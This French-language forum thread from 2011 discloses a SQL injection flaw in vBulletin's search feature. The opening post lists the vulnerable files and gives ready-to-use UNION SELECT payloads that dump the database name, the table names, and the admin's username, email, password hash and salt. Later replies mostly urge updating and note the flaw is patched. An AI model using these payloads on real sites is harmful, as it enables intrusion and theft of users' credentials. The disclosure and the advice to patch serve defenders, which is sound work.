Invité lakamora Posté(e) le 24 mai 2011 Share Posté(e) le 24 mai 2011 -------------------------- # ~Vulnerable Codes~ # -------------------------- /vb/search/searchtools.php - line 715; /packages/vbforum/search/type/socialgroup.php - line 201:203; -------------------------- # ~Exploit~ # -------------------------- POST data on "Search Multiple Content Types" => "groups" &cat[0]=1) UNION SELECT database()# &cat[0]=1) UNION SELECT table_name FROM information_schema.tables# &cat[0]=1) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt) FROM user WHERE userid=1# plus d'info sur : http://j0hnx3r.org/?p=818 il devient bien pourri le vbulletin :confused: Lien vers le commentaire Partager sur d’autres sites More sharing options...
Invité lakamora Posté(e) le 24 mai 2011 Share Posté(e) le 24 mai 2011 reparé cette faille au plus vite Lien vers le commentaire Partager sur d’autres sites More sharing options...
alirobben Posté(e) le 24 mai 2011 Share Posté(e) le 24 mai 2011 C'est déja corrigé, faut juste toujours MAJ, ca sert a ca aussi. Lien vers le commentaire Partager sur d’autres sites More sharing options...
Invité lakamora Posté(e) le 24 mai 2011 Share Posté(e) le 24 mai 2011 oué j'ai vue dans communauté il ya pas group ^^ Lien vers le commentaire Partager sur d’autres sites More sharing options...
sad723 Posté(e) le 24 mai 2011 Share Posté(e) le 24 mai 2011 merci pour l'info; le bon emplacement c'est : Sécurité Informatique http://www.forumdz.com/forumdisplay.php?32-S%E9curit%E9-Informatique ; Lien vers le commentaire Partager sur d’autres sites More sharing options...
Messages recommandés
Veuillez vous connecter pour commenter
Vous pourrez laisser un commentaire après vous êtes connecté.
Connectez-vous maintenant